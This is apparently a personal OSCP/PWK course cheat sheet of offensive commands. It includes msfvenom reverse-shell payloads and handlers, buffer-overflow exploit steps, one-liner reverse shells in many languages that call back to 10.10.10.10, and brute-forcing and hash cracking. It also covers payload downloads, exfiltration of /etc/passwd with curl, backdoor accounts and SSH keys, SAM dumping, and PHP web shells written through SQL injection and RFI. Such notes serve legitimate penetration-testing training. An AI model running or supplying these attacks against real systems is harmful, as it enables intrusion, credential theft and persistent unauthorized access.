Offsec PWK notes and frecuently used files.
nmap++ 1.1.1.1
nbtscan -r 1.1.1.1
enum4linux -USGPoi 1.1.1.1 >> SMB.txt
smbclient -L 1.1.1.1
showmount -e 1.1.1.1
nmap -p 25 --script smtp-enum-users.nse,smtp-commands.nse 1.1.1.1
snmpcheck -t 1.1.1.1 >> ENUM-SNMP.txt
snmpwalk -c public 1.1.1.1 -v 2c
onesixtyone -c public.txt -o snmp-onesixtyone.txt -dd 1.1.1.1
nikto -o nikto.html -Display V -nolookup -host 1.1.1.1 && firefox nikto.html
dirb http://1.1.1.1 /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -l -o dirb.txt
Dirbuster: Change to 50 req/s, no recursion, export simple list.
msf > use auxiliary/scanner/ssh/ssh_enumusers
msfvenom -p windows/shell_reverse_tcp -f asp -o shell.asp LHOST=10.10.10.10 LPORT=443
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 10.10.10.10
set LPORT 443
run
msfvenom -p windows/meterpreter_reverse_tcp -f exe -o metp.exe -e x86/shikata_ga_nai LHOST=10.10.10.10 LPORT=443
msfconsole
use exploit/multi/handler
set payload windows/meterpreter_reverse_tcp
set LHOST 10.10.10.10
set LPORT 443
run
export SMBHASH=903805A370A06846300175DD6E8654A6:4AFCBB33AC6EE45C73B37E5130F25971
pth-winexe -U john //1.1.1.1 cmd
i586-mingw32msvc-gcc MS08-067.c -o MS08-067.exe -lrpcrt4 -lws2_32 -lwsock32 -lmpr
i686-w64-mingw32-gcc MS08-067.c -o MS08-067.exe -lrpcrt4 -lws2_32 -lwsock32 -lmpr
./fuzzer.py
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
Debugger: write down value of EIP (e.g. 39694438)
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
3. Update skeleton script to match new buffer size, pad with a different char (x42) 4 bytes to overwrite EIP.
buffer = "A" * 2604 + "B" * 4
buffer = "A" * 2604 + "B" * 4 + "C" * 400
buffer = "A" * 2604 + "B" * 4 + badchars
Criteria:
1. Does not contain bad characters
2. Does not use DEP or ASLR
Using Mona:
!mona modules
!mona find -s “\xff\xe4” -m slmfc.dll
buffer = "A" * 2604 + "\x8f\x35\x4a\x6f"
buffer = "A" * 2604 + "\x8f\x35\x4a\x6f" + "\x90" * 8
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x09\x0a"
buffer = "A" * 2604 + "\x8f\x35\x4a\x6f" + "\x90" * 8 + shellcode
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.10.10.10
set LPORT 443
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 10
msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.10.10.10
set LPORT 443
msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 10
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.10.10.10
set LPORT 443
ncrack -vv --user rax -P wordlist.txt rdp://1.1.1.1
medusa -h 1.1.1.1 -u root -P /usr/share/wordlists/rockyou.txt -e ns -M ssh
hydra -l administrator -P wordlist.txt 1.1.1.1 ssh
hydra 1.1.1.1:80 http-form-post "/PHP/index.php:nickname=^USER^&password=^PASS^:bad password" -l garry -P /usr/share/wordlists/nmap.lst -t 10 -w 30 -o hydra-http-post-attack.txt
cewl http://1.1.1.1/index.html >> words.txt
john --wordlist=words.txt --rules --stdout >> wordlist.txt
cat shadow.txt | awk -F':' '{print }' > hashes.txt
hashcat -m 500 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1800 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 0 -o output.txt --remove hashes.txt /usr/share/wordlists/rockyou.txt
Local IP: 10.10.10.10
bash -i >& /dev/tcp/10.10.10.10/7777 0>&1
sh -i >& /dev/tcp/10.10.10.10/7777 0>&1
perl -e 'use Socket;$i="10.10.10.10";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10”,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.10.10.10”,7777);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10”,7777).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Linux
nc -vn 10.10.10.10 7777 -e /bin/sh
Windows
nc.exe -vn 10.10.10.10 7777 -e cmd.exe
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/7777;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
powershell.exe
$client = New-Object System.Net.Sockets.TCPClient(“10.10.10.10”,7777);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
PowerShell with nc.exe or another rev shell .exe
PowerShell (New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10/files/meterpreter.exe','meterpreter.exe');Start-Process ‘meterpreter.exe'
http://1.1.1.1/backdoor.php?cmd=%22nc.exe%20-vn%2010.10.10.10%207777%20-e%20cmd.exe%22
python -c 'import pty; pty.spawn("/bin/sh")'
wget 10.10.10.10/linuxprivchecker.py
python linuxprivchecker.py
wget 10.10.10.10/linux-enum-mod.sh
chmod +x linux-enum-mod.sh
sh linux-enum-mod.sh
wget 10.10.10.10/linux-local-enum.sh
chmod +x linux-local-enum.sh
sh linux-local-enum.sh
wget 10.10.10.10/unix-privesc-check
chmod +x ./unix-privesc-check
./unix-privesc-check
wget 10.10.10.10/solaris-exploit-suggester.pl
perl solaris-exploit-suggester.pl
Local
./linux-exploit-suggester.sh --uname 2.6.18-274.3.1.el5
uname -a
id
cat /etc/*-release
cat /proc/version
cat /etc/issue
ifconfig -a
netstat -ano
netstat --tcp
netstat -s --tcp
nmap -p - -sV localhost
cat /etc/passwd
cat /etc/hosts
arp -a
iptables -L
crontab -l
cat /root/.ssh/known_hosts
find . -name "*password*"
cat process.txt | grep root | cut -d " " -f 9 | grep "\[" | cut -d "[" -f 2 | cut -d "]" -f1 | cut -d "/" -f1 >> root_process.txt
cat root_process.txt | sort -u > proccess.txt
for i in `cat process.txt` ; do searchsploit %i ; done
wpc.exe --audit -a -o report
cd /Offsec
python windows-exploit-suggester.py --database 2018-09-02-mssb.xls --systeminfo sys-info.txt
python windows-exploit-suggester.py --database 2018-09-02-mssb.xls --ostext 'Windows Server 2008 R2'
tree /f /a
systeminfo
type boot.ini
hostname
ipconfig /all
netstat -ano
nmap.exe -p - -sV localhost
net users
net localgroups
route print
arp -A
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v
net start
accesschk.exe -uwcqv "Authenticated Users" *
dir network-secret.txt /s
run arp_scanner -r 1.1.1.0/24
use auxiliary/scanner/portscan/tcp
use post/windows/escalate/getsystem
Windows Privilege Escalation Matrix
wget -O exploit.c 10.10.10.10/exploit.c
curl --upload-file /etc/passwd http://10.10.10.10
Local (start the service)
atftpd --daemon --port 69 /tftp
Remote
tftp -i 10.10.10.10 get nc.exe
echo USER>> ftp.txt
echo offsec>>ftp.txt
echo lab123>>ftp.txt
echo binary>>ftp.txt
echo get nc.exe>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt 10.10.10.10
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.10.10/fgdump.exe" >>wget.ps1
echo $file = "new.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
dir network-secret.txt /s
find . -name "network-secret.txt"
windump -i 2 -w capture -n -U -s 0 src not 10.10.10.10 and dst not 10.10.10.10
tcpdump -w capture -n -U -s 0 src not 10.10.10.10 and dst not 10.10.10.10
p0f -i eth0 'src not 10.10.10.10 or dst not 10.10.10.10'
Maintain Access
Local machine
cat ~/.ssh/id_rsa.pub
Remote machine
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8q88wXf4E+dmEHH2ccGhGCgNdfgq4y9l4jthBxgGIzztnQs438/WxD+Fm2fwaya3YwLip3da6Pj2x1aH08Y8kYPgou8M+MXC1hD0z5YxZ4W7htfSb3X7a8mKRavcv8h1efyqdCwdzhJG48ZEHDQnspuv2DzwzynFDR89C0M8h5gw0X2Tj3ztl5tOhhJymPWVNHDnLFLDLUFuxC74gEz7rCurWvb1wKZ+XJfurr07ZmWId4tEdb04sabyEru/iEgUJawTbszHQA53BocY64qMcGgWze51RbfQ8ijqkKc88SkVlOxFKI3ecZp3lmeFaAuy8UO3Jx1GNO22SBmEz/v root@Kali" >> /root/.ssh/authorized_keys
useradd -u 1037 -g users -d /home/rax -s /bin/bash -p $(echo 1234 | openssl passwd -1 -stdin) rax
net user rax Cisco123 /add && net localgroup Administrators rax /add
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
net start Termservice
netsh.exe
firewall
add portopening TCP 3389 "Remote Desktop"
reg save HKLM\SAM %computername%.sam
reg save HKLM\SYSTEM %computername%.system
fgdump.exe
portfwd add -l 8000 -p 3389 -r 1.1.1.1
All connections to 1.1.1.1:9000 will be forwarded to 2.2.2.2:80
vi /etc/rinetd.conf
# bindaddress bindport connectaddress connectport
1.1.1.1 9000 2.2.2.2 80
rinetd
The local machine connects to a host on the outside (1.1.1.) through SSH and- then forwards traffic sent to the local loopback on a given port (9090) to a host on the Internet (2.2.2.2) on a remote port (443)
ssh [email protected] -L 9090:2.2.2.2:443
A remote host connects to my machine (10.10.10.10) through SSH which is running on port 53 and publishes one if its open ports (10443) through my local loopback on a local port (10000)
ssh 10.10.10.10 -p 53 -R 10000:127.0.0.1:10443
The local machine connects to a remote host 1.1.1.1 and proxies its traffic thru the remote host to another host 2.2.2.2
ssh -D 8080 [email protected]
proxychains nmap -p 22,80,222,10000 -sT -Pn 2.2.2.2
Mapping and Scanning (unauthenticated)
1. Browse Site Using ZAP, check all normal functionalities
2. Go to root directory, right click, spider
3. Right Click Active Scan, Show Advanced, select applicable technologies and OS, run
Authentication
1. Right click add to new context
2. Session Management (most likely will be cookie based)
3. Go to the Web app and Authenticate
4. Check Session Tree and look for a POST to the login form, right click and then select “Flag as context”, Form Based Authentication Request.
5. Select Username and Password parameter from the dropdown
6. Go back to the session three, look for the POST to the login form again, check the response tab and look for a “logged in indicator” in the HTML source code and then right click, flag as context, logged in indicator.
7. Add Users under the context “users” tab
8. Right Click on the index page, attack, then spider, select the user from the drop down.
9. Rick Click on the context, active scan, select the user from the drop down
Review Source Code
Review Response Headers
CMS: Review CMS type, version, manual and default admin credentials
curl "https://1.1.1.1/<?php echo shell_exec($_GET['cmd']);?>"
curl "https://1.1.1.1/%3C%3Fphp%20echo%20shell_exec%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E"
curl "https://1.1.1.1/section.php?cmd=cat%20/etc/passwd&page=../../../../../proc/self/fd/10%00"
Shellshock
curl http://1.1.1.1/cgi-bin/admin.cgi -H"User-Agent:() { :; }; /bin/bash -c ifconfig “
Vulnerable URL/Parameter:
http://1.1.1.1/mvc/Product.aspx?id=1
id=1'
id=1 order by 1
id=1 order by 2
...
id=1 order by 9
id=1 union all select 1,2,3,4,5,6,7,8
id=-1 UNION SELECT version(),2,3,4,5,6,7,8
id=99999 UNION SELECT user(),2,3,4,5,6,7,8
id=1=2 UNION SELECT database(),2,3,4,5,6,7,8
id=0 and 1=2 UNION SELECT table_name,2,3,4,5,6,7,8 from information_schema.tables where table_schema='bricks'
id=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema='bricks' and table_name='users' LIMIT 0,1 -- -
...
id=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema='bricks' and table_name='users' LIMIT 7,1 -- -
id=0 and 1=2 UNION SELECT concat(name,CHAR(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 0,1 -- -
...
id=0 and 1=2 UNION SELECT concat(name,CHAR(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 7,1 -- -
id=0 'UNION ALL SELECT 1,2,3,4,5,"<?php echo shell_exec($_GET[\"cmd\"]);?>" into OUTFILE "/var/www/html/rax.php”
id=0 'UNION ALL SELECT "<?php echo shell_exec($_GET[\"cmd\"]);?>",2,3,4,5,6 into OUTFILE "c:/xampp/htdocs/rax.php" #;
http://1.1.1.1/index.php?slogin_path=http://10.10.10.10/php-reverse-shell.txt?
http://1.1.1.1/index.php?slogin_path=http://10.10.10.10/php-reverse-shell.txt%00
Other Resources
Pentest Monkey MySQL Injection Cheat Sheet
Pentest Monkey MSSQL Injection Cheat Sheet
- Always Review Source Code
- Check Sudo Version
- In most cases RFI vulns can be used as LFIs too
- In most cases LFIs can be used to read arbitrary files on the system